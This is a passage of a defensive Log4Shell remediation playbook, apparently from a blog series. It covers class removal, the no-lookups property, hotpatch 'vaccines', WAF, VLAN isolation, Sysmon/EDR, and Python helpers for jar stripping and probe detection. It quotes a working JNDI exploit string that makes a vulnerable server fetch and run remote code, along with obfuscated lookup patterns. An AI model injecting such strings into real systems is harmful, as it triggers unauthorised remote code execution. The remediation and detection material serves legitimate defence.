Turn JNDI logging off completely if not needed, or do what CISA recommends and temporarily disconnect the stack from the network (or segment it with certain inbound and outbound rules, etc.). This could have unintended consequences though, so you may want to test quickly.
Disabling may well be worth the risk, but it should be tested by the technicians and decided by leadership based on risk. Each company should determine what is acceptable. I’m not responsible for issues this may cause; follow any of this advice at your own risk.
There will be some consequences and tradeoffs, be ready for those. Ensure the right level of leadership makes the decision regarding the risk and consequences. Every stakeholder should push such decisions to the right level ASAP regarding such things, and should not accept risk on behalf of the entire company – this decision is above their pay grade and needs to at minimum float to the CISO and CIO.
Upguard provides some info on how to disable JNDI logging per: https://www.upguard.com/blog/apache-log4j-vulnerability
“To disable JNDI lookups:
Vulnerable versions of Log4j can also be secured by removing JndiLookup class from the following classpath:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Also “Note: for *any* version you can delete the JndiLookup.class
Note: Hosts running on JDKs versions higher than 6u141, 7u131, 8u121 will be protected against the LDAP class loading vector BUT NOT the deserialisation vector. This is because com.sun.jndi.ldap.object.trustURLCodebase is disabled by default, hence JNDI cannot load remote codebase using LDAP. But I must stress deserialisation and variable leaks are still possible.”
Ref: https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/
Also SNYK has some instructions as well at item #3 on their page for “Remove the Log4j lookup capability” and they give the caveat that “Removing this on running environments is not enough by itself, you will also need to restart your JVM environment.
If you’re using a Tomcat server, for example, you’ll need to stop and start the server. An example command to remove the class file from your JAR is as follows:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
It is also a good idea to remove other classes at the same time which could also be used in this or similar attacks. These files include JndiManager, JMSAppender, and SMTPAppender. Be warned that removing classes from a runtime environment may cause unexpected behavior.”
Ref: https://snyk.io/blog/log4shell-remediation-cheat-sheet/
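For teams that prefer to script the class removal and keep the original jar untouched for rollback, the following is a minimal sketch of the same idea as the `zip -d` command above. It writes a stripped copy rather than editing in place. The function name `strip_classes` is hypothetical, entries are matched by file name only so no package paths are assumed beyond what the jar actually contains, and it does not handle signed jars or jars nested inside other archives. The JVM restart caveat quoted above still applies.

```python
import zipfile
from pathlib import PurePosixPath


def strip_classes(src_jar, dst_jar, class_files=("JndiLookup.class",)):
    """Copy src_jar to dst_jar, skipping entries whose file name is in class_files.

    Returns the list of entry paths that were left out of the copy.
    """
    wanted = {name.lower() for name in class_files}
    removed = []
    with zipfile.ZipFile(src_jar) as src, \
            zipfile.ZipFile(dst_jar, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            # Compare only the last path component, e.g. "JndiLookup.class".
            if PurePosixPath(info.filename).name.lower() in wanted:
                removed.append(info.filename)
                continue
            dst.writestr(info, src.read(info.filename))
    return removed
```

An empty return value means the jar did not contain the class, which is worth logging, since it may indicate the jar was already mitigated or is not log4j-core at all.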
=====================================
#5 – CHANGE PROPERTIES SO NO LOOKUPS OCCUR - IF UNABLE TO PATCH (or just do this as an added layer of protection if needed, proceed with caution)
- I decided this one is #5 because of a few caveats that can be seen below – it might cause some resource availability issues, added work and is only a partial fix at that
To do this, Upguard recommends: “If upgrading to the latest Log4j version isn’t possible, security teams should implement the following response immediately for versions 2.10 to 2.14.1:
Either set the following system property to true:
log4j2.formatMsgNoLookups
Or set the following environment variable to true:
LOG4J_FORMAT_MSG_NO_LOOKUPS”
Ref: https://www.upguard.com/blog/apache-log4j-vulnerability
Snyk gives these caveats for this method: “Similar to the removal of Log4j files, these changes will require a JVM restart, which might mean stopping and restarting your Tomcat server (for example) so that the new properties can be used.
Note that it has been discovered that this approach is a partial fix only.” Ref: https://snyk.io/blog/log4shell-remediation-cheat-sheet/
CISA caveat “This option, while effective, may involve developer work and could impact functionality.” Ref: https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures
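Because this setting has to be present on every affected JVM, it helps to verify it rather than assume it. The sketch below checks a JVM's argument list and environment for the property and variable named above. The function names are hypothetical, and how you collect the arguments and environment (for example from a process listing or a service definition) is left as an assumption. The sketch deliberately does not model which source wins if the two disagree, and per the Snyk caveat a positive result still means only a partial fix.

```python
PROPERTY_PREFIX = "-Dlog4j2.formatMsgNoLookups="
ENV_NAME = "LOG4J_FORMAT_MSG_NO_LOOKUPS"


def _as_bool(value):
    """Interpret a setting value; anything other than 'true' counts as False."""
    return value.strip().strip('"').lower() == "true"


def no_lookups_settings(jvm_args, env):
    """Return (property_value, env_value); each is None when that source is unset."""
    prop = None
    for arg in jvm_args:
        if arg.startswith(PROPERTY_PREFIX):
            prop = _as_bool(arg[len(PROPERTY_PREFIX):])
    env_value = _as_bool(env[ENV_NAME]) if ENV_NAME in env else None
    return prop, env_value


def mitigation_declared(jvm_args, env):
    """True if either source sets the no-lookups flag to true."""
    prop, env_value = no_lookups_settings(jvm_args, env)
    return prop is True or env_value is True
```

Running this across a server inventory gives a quick list of JVMs that were missed or that have not been restarted with the new settings.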
=====================================
#6 – INOCULATE AND / OR HOTPATCH IN THE INTERIM IF FEASIBLE
- I decided to make this one #6 because they may require some level of effort to test, configure, deploy, make corrections, etc.
- There are unknowns with any free product produced so quickly - these could have unintended consequences and I have not tested these nor can vouch for how effective they are – test and verify
Solutions that seem promising – Cybereason, Lunasec Hotpatch, Traceable AI’s product, etc.
I HIGHLY recommend that any tool used be tested on an isolated test environment first. I also HIGHLY recommend that any tool downloaded should include first reading any readme file or information available on GitHub and follow vendor/producer’s instructions. Use at your own risk!
Doing these could reduce potential operational risk to the network. Caveat: if any adverse things occur on the test side, or if the scan or tool is found to be clumsy or inadequate, then obviously do not use it on the live network.
The team should Vaccinate as soon as possible and provide any immediate protections (such as hotpatch) in the interim against the Log4J vulnerabilities, especially if normal patching will take longer than a few days.
Below are 3 resources to help. I have not used or tested these, nor do I make any guarantees. Again, I highly recommend testing first before deploying or using.
-------
A. Cybereason Logout4Shell Inoculator called “Logout4shell”
https://github.com/Cybereason/Logout4Shell
CISecurity says to use caution (https://www.cisecurity.org/log4j-zero-day-vulnerability-response/) as any automated solutions that perform mitigation could have unintended effects. I make no guarantees, use at your own risk. Cybereason says:
“The previous version of the Vaccine used the Log4Shell vulnerability to remove the JNDI interpolator entirely from all logger contexts to prevent the vulnerability from being exploited in the running JVM (server process).
This update not only fixes the vulnerability, but also edits the jar file on disk to remove the JndiLookup class to permanently mitigate the Log4Shell vulnerability on a running server. It also performs additional changes on the plugin registry.
Due to the nature of the permanent solution, there is nominal risk involved, so the Vaccine offers the option to execute the completely safe but temporary solution, or the slightly more risky but permanent solution. The documentation has been updated to reflect that we now support both options.
The Log4shell vulnerability still requires patching. This updated Logout4Shell mitigation option can provide security teams the time required to roll out patches while reducing the risk from exploits targeting the Log4j vulnerability.”
Ref: https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228 [emphasis mine]
-------
B. Lunasec Hotpatch
https://www.lunasec.io/docs/blog/log4shell-live-patch/
"If you find yourself stuck between a rock and a hard place for fixing this issue at your company, you might find yourself wishing for something better. Fortunately, the clever people of the internet have come up with a solution that may help you remedy this painful situation.
By placing this string...
${jndi:ldap://patch.log4shell.com:1389/a}
...anywhere you can in your infrastructure that you're vulnerable to Log4Shell, you will be rolling out a temporary fix that gives you more time to patch.
We run that server, but it's been built due to the work of many smart people working on and dealing with the fallout from Log4Shell. We've just made it a little easier for you to use by hosting it for you.
This string will attempt to exploit the Log4Shell vulnerability and apply a patch to your live system. While this patch has been tested on a number of systems, your system might be different and could possibly crash. You have been warned.
If it doesn't work for some reason, your server will hang and possibly need a manual restart."
Ref: https://www.lunasec.io/docs/blog/log4shell-live-patch/
[emphasis mine…they also provide the code to do this yourself – please realize that if you use their solution you may be subjecting your network to unknown risk so be very careful – the tradeoff might result in an immediate temporary fix and depending on various factors, this risk decision is entirely yours. Great to see they offer a manual solution option to keep your data internal. Just realize any tool may have unknown code, use at your own risk]
-------
C. Inoculate using the Traceable AI Solution. Again this sounds promising and may be a good quick fix worth exploring. I make no guarantees. Note also this and other solutions are likely “freemium” and offer a free trial initially but eventually will require cost to maintain. Again consider these things carefully before becoming dependent on any external trial or tool. See:
https://www.traceable.ai/free and https://www.traceable.ai/log4shell_quick_start_protection
also note they state:
“By default, Traceable Java tracing agent will block all JNDI lookups. If your existing application cannot function and log properly with JNDI Lookup disabled, you can still enjoy the protection of Traceable. To NOT disable JNDI lookup, set environment variable on the application pod as follows:
env var TA_BLOCKING_LOG4J2_JNDI=false
If you encounter any issues with deployment or use please reach out with any comments, questions, or concerns to support@traceable.ai”
Per the earlier provided CIS link, they also quoted TrustedSec’s instructions for how to do this:
“If it is not possible to upgrade, there are several mitigation tactics that can be performed.”
For Log4j versions >= 2.10, set the log4j2.formatMsgNoLookups system property to true on both client- and server-side components.
This can be done in multiple ways:
Add -Dlog4j2.formatMsgNoLookups=true to the startup scripts of Java programs; or
Set the following environment variable: LOG4J_FORMAT_MSG_NO_LOOKUPS="true"
For Log4j versions from 2.0-beta9 through 2.10.0, remove the JndiLookup class from the classpath. For example
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Again that was per TrustedSec Ref: https://www.trustedsec.com/blog/log4j-playbook/
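The version ranges in the TrustedSec guidance can be turned into a small lookup so an inventory of Log4j versions maps to an interim action. This is a minimal sketch under stated assumptions: the function names and the returned strings are hypothetical, the version parser only understands forms like `2.14.1` or `2.0-beta9`, and since 2.10.0 falls into both quoted ranges the sketch picks the property-based option for it. It encodes only the quoted interim guidance and does not replace upgrading.

```python
import re

_VERSION = re.compile(
    r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?$", re.IGNORECASE
)
_STAGES = {"alpha": 0, "beta": 1, "rc": 2}


def parse(version):
    """Turn '2.0-beta9' or '2.14.1' into a tuple that sorts in release order."""
    m = _VERSION.match(version.strip())
    if not m:
        raise ValueError(f"unrecognized version: {version!r}")
    major, minor, patch = int(m[1]), int(m[2]), int(m[3] or 0)
    # A final release (stage 3) sorts after any pre-release of the same number.
    stage = _STAGES.get((m[4] or "").lower(), 3)
    return (major, minor, patch, stage, int(m[5] or 0))


def interim_mitigation(version):
    """Map a Log4j version to the interim action from the quoted guidance."""
    v = parse(version)
    if v[0] == 2 and v >= parse("2.10"):
        return "set log4j2.formatMsgNoLookups=true"
    if v[0] == 2 and v >= parse("2.0-beta9"):
        return "remove JndiLookup.class from the jar"
    return "outside the quoted guidance"
```

For example, `interim_mitigation("2.8.2")` selects the class-removal option, while `interim_mitigation("2.14.1")` selects the property.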
-------
CISA Recommended Hotpatches:
NCC Group: log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228 https://github.com/nccgroup/log4j-jndi-be-gone
Amazon AWS:
GitHub page: https://github.com/corretto/hotpatch-for-apache-log4j2
Blog: https://aws.amazon.com/blogs/opensource/hotpatch-for-apache-log4j/
Ref: https://www.cisa.gov/uscert/ncas/alerts/aa21-356a
=====================================
#7 – DEPLOY A WAF (THIS IS A THIN LAYER and AUTOMATED UPDATES ARE A MUST!)
- If no WAF existed prior, this would require some logistics so I put it as #7
- This one could have easily been #1 if an NGFW exists already in the right place or may already be done and just needs to be verified or enabled
- This one may also involve some configs and architecture changes and is not a very strong solution so again I made it #7
Per CISA “Deploy a properly configured Web Application Firewall (WAF) in front of the solution stack. Deploying a WAF is an important, but incomplete, solution. While threat actors will be able to bypass this mitigation, the reduction in alerting will allow an agency SOC to focus on a smaller set of alerts.”
Ref: https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mi
Note – find out if your Next-gen firewall already has you covered in this area – if so, ask security engineers to segment and set up accordingly. Some have stated that certain NGFW are able to act as a WAF in terms of capability, please test and verify the capabilities of any tools and claims.
Snyk says “WAF rules can be added to filter inbound requests.
Note that this isn’t an approach that should be relied upon, since attackers are creating new attack strings every hour that can circumvent these rules.
You might need to add these manually, but some WAF providers, such as CloudFlare, have already released new rules to deny requests that look like malicious attacks against this vulnerability.” Note: Examples to bypass rules can be found at their link below and should be noted for potential detections and detection queries. These are subject to change like any IOC.
Ref: https://snyk.io/blog/log4shell-remediation-cheat-sheet/
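To illustrate why a plain string match on `${jndi:` is easy to bypass, and how a detection query might compensate, here is a minimal sketch that collapses a few well-known nested-lookup tricks before matching. The function names are hypothetical and the handled forms (`${lower:x}`, `${upper:x}`, default-value forms such as `${::-x}`, and URL encoding) are only a sample. Consistent with the Snyk caveat above, new bypass strings keep appearing, so this should not be relied upon as complete.

```python
import re
from urllib.parse import unquote

# Innermost ${lower:x} / ${upper:x} lookups collapse to x.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# Innermost default-value lookups such as ${::-j} or ${env:NOPE:-j} collapse to j.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def normalize(text, max_rounds=10):
    """Undo URL encoding, then repeatedly collapse simple nested lookups."""
    text = unquote(text)
    for _ in range(max_rounds):
        collapsed = _CASE_LOOKUP.sub(r"\1", text)
        collapsed = _DEFAULT_LOOKUP.sub(r"\1", collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text


def looks_like_jndi_probe(text):
    """True if the normalized text contains a ${jndi: lookup."""
    return bool(_JNDI.search(normalize(text)))
```

A naive check for the literal `${jndi:` misses a string like `${${lower:j}ndi:ldap://host/a}`, while the normalized check catches it.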
=====================================
#8 – ISOLATE VULNERABLE SYSTEMS THAT MUST USE JNDI - INTO UNTRUSTED VLAN(s)
- I made this one #8 because it requires some added logistics and changes that could involve architecture, testing and change control – these could take time
- May want to establish an emergency process or use an existing emergency change control process – to expedite if the risk is acceptable and other options are slower
- This one depends on correct configs and may require some testing and tuning
- Work with your network admins and/or network security side to ensure success
- If unable to segment everything, then segment at least highest risk / most vulnerable / most critical systems
Per CISA advice “Moving the asset to a ‘jail VLAN’ with heightened monitoring and security” Ref: https://www.cisa.gov/uscert/ncas/alerts/aa21-356a. Work with your network folks to determine what is and is not feasible in light of that advice.
=====================================
#9 – START PATCHING OTHER CRITICAL SYSTEMS, PREPARE TO TRANSITION TO TIGER TEAM for the LONG-TERM
- The reason I made this one last is because this will become more of a long-tail effort
- I advise that companies not try to patch everything at once – this will burn people out
- Establish a risk-based process with clear priorities, then transition to a Tiger Team using a bottom-up, project-like approach, and then look for longer-term solutions (I will cover this in a future article)
- This may require adjusting some strategic objectives and program/projects currently under way to shift resources to this new focus area – choices and trade-offs must be made
- This also speaks to ensuring one builds in a surge capability for these types of major vulnerability events as part of the norm of possibility
- This is better than disrupting existing projects – because the norm means “there will be pop-up surprises and emergencies”
- Since this is predictable, make deliberate preparations!
In a future article, I will talk about how to be more deliberate and better prepared for these situations based on decades of lessons learned in a military environment. The process must be deliberate, and preparation and training are keys to readiness. Otherwise, each time will bring an emergency that results in disruption and chaos, derailing other projects. There is a better way. Some basic concepts which are important follow.
Prepare for a Transition from Surge to Sustainment Operations for Log4J, SolarWinds, etc.
While there are some assets to patch ASAP with the IR team process, this should be followed by an eventual transition process, using a longer-term project-based approach. I recommend this transition to a Tiger Team happens within 30 days or less, if possible. This provides a goal to achieve everything needed (such as what I’m providing in playbooks 2A and 2B) using a time-bound approach.
The Tiger Team should also include a re-normalization milestone. I recommend returning to "normal base operations" within 90 days after the transition, if possible, to absorb any residuals. Then require “new normal” items from Log4J, for example, to roll into the normal ops and maintenance process so that longer-term sustainment can continue to meet the challenge for the long haul. Here is the basic concept:
- Immediate emergency response capability (Day 1 - Day 30 - max)
- Secondary response and transition using Tiger Team if needed (Days 30-90) - and/or
- Transition to baseline operations (must be robust enough to be absorbable)
One must look at doing such things anytime a major issue occurs in cyber, as well as how to transition back to normal operations after a surge. It never ceases to amaze how the concepts ingrained from years in the military are so directly applicable and could prove valuable for cyber defense processes.
And by the way, any company that hires a Veteran gets this value and doesn't even realize it. The value of someone trained and ingrained with a mindset to make things better, using various concepts and constructs they learned and applied in real-world situations, is invaluable.
Coming Soon
I'll provide a longer-term bottom-up strategy to help others transition and eventually re-normalize operations. This “line of effort” should be done via a separate Tiger Team from the IR team tackling things in Part 2A and 2B of this playbook. This team is needed so things can be paced, to avoid burnout.
Seek out experience-based consulting and guidance in this area. It is best to ask those with direct experience with these vendors and their products, with running proof-of-concepts, and with selection processes: testing, evaluating, making purchase decisions, and handling the logistics of such tools.
Again, I advise a transition occur between the teams after completing these major and quick response items in this playbook. A Tiger Team should be stood up to continue the efforts after the 30-day mark, that will require longer-term projects or lines of effort, until complete and things can get back to normal sustainment levels.
Additional Notes and Cautions
While as of this writing I stand by the order recommended above for actions to take, this is not permanent. If one or two solutions become more effective and/or enduring than the rest, then obviously do those first. “Adjust fire” as they say (for any military folks out there.)
Note also the size and context of companies can differ significantly. Some are fully cloud-based, others are often hybrid. Some companies are small, others are large. Some have OT, others do not. Additionally, the number of resources and maturity levels vary. Number of devices and products also vary.
This means each company’s Cyber and IT team is encouraged to analyze the advice, conduct initial tests themselves, and determine the best courses of action applicable for their context. There are several other variables at play where one size does not always fit all. I have tried to keep that in mind as I provide the advice I feel could fit most companies initially.
Teamwork and cooperation are required between Cyber and IT teams for “unity of effort”
“Unity of effort” is again another one of those enduring principles that help defenders achieve success. These efforts should consist of several actions requiring dedicated teamwork and response:
- Isolating and remediating any attacked and compromised assets
- Looking at the rest of the kill chain to determine further post-exploit compromise and then working quickly to eradicate these
- Simultaneously working these steps recommended in this playbook (part A and B)
- Transitioning to longer-term tiger-team / project-based approach when appropriate
The team should use reliable and trusted scan and test tools made available by existing tools in the environment (vulnerability scanners, Antivirus, network, etc.). I’ve provided the links to the ones that seem to be trusted and helpful, plus freely available for immediate use.
If you have any feedback regarding these tools and recommendations, please let the creator of the tool know directly and query them for a fix. Please don’t send these requests my way, as I have no control over the quality, output or changes to tools. Use entirely at your own risk.
If you desire, let me know if there is anything else you discover for the benefit of the community that I can share i.e. “lessons learned” that could help others save time, energy and effort and avoid friction where possible. Comments are best in that regard.
Caution must be taken, as early advice and tools are usually at the bleeding edge and may contain some flaws. Note that permission should be obtained from the CISO and/or CIO before any tools or scripts are run on the live operational network.
Since I’ve been on both the IT side of things and Cyber side of things, I have appreciation for both. This is why I recommend any script, tool or code used on the network be approved first for test, and then operations only via a documented decision made by CISO and/or CIO.
Final Caveats and Recommendations
1. Daily communication and coordination are a must for success of these efforts. Management should be deliberate in their approach to facilitate this and achieve unity of effort and success.
2. Please do your own due diligence to ensure any security or other tool brought into the environment is not itself vulnerable to Log4J or similar logging attacks. Ask the vendor, and keep these tools patched. Some publicly available tools may not be patched so be aware of that.
3. Information in Cyber gets stale quickly - to include this info, and may not be kept current. I do not provide any claims, warranties or guarantees that anything will work as described or expected. You probably already knew that. Test everything first and deploy carefully and at your own risk.
4. Strongly consider deploying EDR and/or SYSMON if you are not using either of these – they're critical for visibility and dealing with issues such as the risk posed by Log4J vulnerabilities. See appendix A below. There are some excellent solutions available today that can be deployed in hours to maximize visibility and defenses greater than ever before in a scalable way.
=================================================================
APPENDIX A – SYSMON and EDR-BASED ADVICE
If EDR or SYSMON is not already running on key Servers, I highly recommend it. EDR and SYSMON are usually lightweight on the endpoint and quick to deploy, much quicker than other endpoint agents such as Traditional Antivirus. They can even be added on top of other existing AV, although be really careful there, and test thoroughly.
Sometimes things can go bad, so ask if Traditional AV vendors have any EDR solutions as part of their package, as an option rather than using rip-and-replace. Most Traditional AV vendors now offer EDR. How mature their solutions are also varies, as does how tamper-proof the solutions are.
I feel that if you’re not already running EDR, you’re way behind in terms of modern security telemetry and visibility. Again, an interim step is to use Sysmon until EDR is deployed. See item in step #1B mentioned earlier. Both collect a lot of great telemetry from endpoints.
Another idea is to deploy EDR on a graduated group of test systems using a vendor proof-of-concept trial. This provides an opportunity to test a vendor’s product and determine if it adds value beyond what current tools provide.
EDR Should be Easy-button Easy
EDR should not be high-maintenance or cumbersome in any way, and it should be easy to deploy, use and detect/block/respond. It should be a huge force multiplier and boost capabilities, not drag them down.
If your existing EDR is not helping, there are many great options out there. Half the battle is how automated they are, as well as how easily they block and/or alert – to minimize the learning curve. They should be intuitive. I will talk about the importance of EDR and other considerations in another future post.
The ability to see and quickly reach out and touch assets no matter where they are is critical, and that’s what EDR provides. If you have a prem-based solution for Antivirus and cannot reach out and touch assets when they are remote, that’s a problem.
There are some EDR options that are simple to use, quick to deploy and have great out-of-box detections and automated blocking capabilities using built-in UEBA to reduce response time. Some work much better than others, catch nearly everything and cause less friction when implementing.
There is advice on EDR options, the process of testing in a POC, as well as vendor selection that is also important. Retaining someone who understands the implementation and logistical aspects involved for behavior-based products such as EDR and network-side behavior-based products is critical.
I also understand concerns of budget and training and am happy to advise on options and considerations that lead to a smart decision. Shameless plug - I have a relationship with a couple of vendors but also don’t make cyber product investment recommendations lightly for any paid solutions. I currently do not have relationships with the other vendors in this post, so proceed at your own risk.
Use SYSMON if EDR is not possible
SYSMON is free for Windows and now freely available for Linux (credit to Splunk for the tidbit)
This provides an option to deploy SYSMON to relevant servers and other endpoints beyond Windows machines, especially those with no EDR solution providing endpoint telemetry, such as Apache servers. That telemetry is sorely needed for Log4Shell attacks.
Without it, companies might be blind to attacks on these endpoints, even if Antivirus (AV) is running on them. This is because Traditional AV may not detect the attack if it does not include EDR capability.
Traditional AV only detects signature-based issues after-the-fact and after-the-scan. Use Sysmon as an interim step or backup to EDR if your organization requires the depth and endpoints can handle the agents.
Helps:
For Log4J attack detections, here are links for Sysmon for Linux. Note there are other tools also available for telemetry for Linux such as Procmon:
Sysmon for Linux: https://github.com/Sysinternals/SysmonForLinux
Procmon for Linux: https://github.com/Sysinternals/ProcMon-for-Linux
Procdump for Linux: https://github.com/Sysinternals/ProcDump-for-Linux
Sysmon for Windows: https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon
Per Splunk, "Here’s a raw event search you could use to find all processes, or parent processes, with “log4j” in the name, against Sysmon data (both Linux and Windows)." See: https://www.splunk.com/en_us/blog/security/log-jammin-log4j-2-rce.html for the detection code and instructions.
Splunk mentions "Another technique for detecting the presence of Log4j on your systems is to leverage file creation logs, e.g., EventCode 11 in Sysmon" and they provide a valuable search hunting string at the above link as well. If using Splunk, I highly recommend ensuring this detection is implemented and tested.
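For teams that are not on Splunk, the same file-creation idea can be applied to exported Sysmon events. The sketch below is not Splunk's search; it is a minimal illustration that assumes events have already been parsed into dictionaries with `EventCode` and `TargetFilename` keys. Those key names and the function name are assumptions about your export format, so adjust them to match your pipeline.

```python
import re

# Matches a file name that contains "log4j" and ends in .jar, on either
# Windows or Linux paths. The character class stops at path separators.
_LOG4J_JAR = re.compile(r"log4j[^/\\]*\.jar$", re.IGNORECASE)


def log4j_file_creations(events):
    """Return target paths of file-creation events (EventCode 11) for log4j jars."""
    hits = []
    for event in events:
        if str(event.get("EventCode")) != "11":
            continue
        target = event.get("TargetFilename", "")
        if _LOG4J_JAR.search(target):
            hits.append(target)
    return hits
```

Matching on the file name only will miss jars that were renamed or bundled inside other archives, so treat an empty result as inconclusive.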
Splunk also provides several other searches for hunt queries for possible attack indicators:
- Suricata and other IDS query
- Detecting Outbound LDAP Access on Your Network
- Correlation of JNDI Probes with DNS Queries
- Other detections related to outbound and inbound traffic
Credit: https://www.splunk.com/en_us/blog/security/log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued.html
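The correlation of JNDI probes with DNS queries can be sketched outside of Splunk as well. The idea is that a probe alone means someone tried, while a DNS lookup for the same host from one of your servers suggests the lookup actually fired. This minimal sketch assumes web request lines and DNS query records are already available as plain Python values; the function names and the `(client_ip, queried_name)` record shape are hypothetical. It only extracts hosts from unobfuscated probes, so obfuscated strings would need normalizing first.

```python
import re

# Host portion of a plain ${jndi:<scheme>://host...} probe.
_JNDI_HOST = re.compile(
    r"\$\{jndi:(?:ldap|ldaps|rmi|dns)://([^/:}\s]+)", re.IGNORECASE
)


def probe_hosts(request_lines):
    """Collect hostnames that appear inside JNDI probe strings."""
    hosts = set()
    for line in request_lines:
        for match in _JNDI_HOST.finditer(line):
            hosts.add(match.group(1).lower())
    return hosts


def resolved_probe_hosts(request_lines, dns_queries):
    """Map each probed host that was also queried in DNS to the querying clients.

    dns_queries is an iterable of (client_ip, queried_name) pairs.
    """
    wanted = probe_hosts(request_lines)
    found = {}
    for client_ip, name in dns_queries:
        host = name.rstrip(".").lower()
        if host in wanted:
            found.setdefault(host, set()).add(client_ip)
    return {host: sorted(clients) for host, clients in found.items()}
```

Any internal client that shows up in the result is a strong candidate for immediate isolation and deeper hunt actions.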
Again, if Sysmon is capturing this data and floating it to Splunk these are critical alerts that must get the attention of your SOC security alerting and monitoring process, as well as hunt teams.
EDR is a lightweight option that can provide immediate visibility and telemetry in the critical places where it is needed. For threat hunting teams, timely threat intelligence is needed for timely hunt operations. In addition, tools like EDR provide the info and ability to touch these assets.
Again, Sysmon is an alternative, but it has less capability than EDR, requires more tuning, learning and configuration, and does not come with pre-built analytics or automations. All of these take time to implement and tune. EDR could achieve these things more quickly, especially if the solution includes managed services, automated blocks, playbooks and built-in analytics.
Finally, any links, advice, tools or recommendations provided should not be assumed to be tested or vetted. I have not tested anything listed herein. The quality of the resources is unknown. If you visit and/or follow advice or any links herein, you do so completely at your own risk.
Stay Tuned for What’s Next and let me know if this was helpful!
Slay the Log4Shell Dragon TEAM 2B - Attack Detection and Response Playbook
Then, Part 2B will be followed by the longer-tail things organizations must address:
- Slay the Log4Shell Dragon 3 – Transition to a Tiger-Team and Bottom-up Strategy
- Slay the Log4Shell Dragon 4 – Focus on Application Security - Tackle Root Cause Issues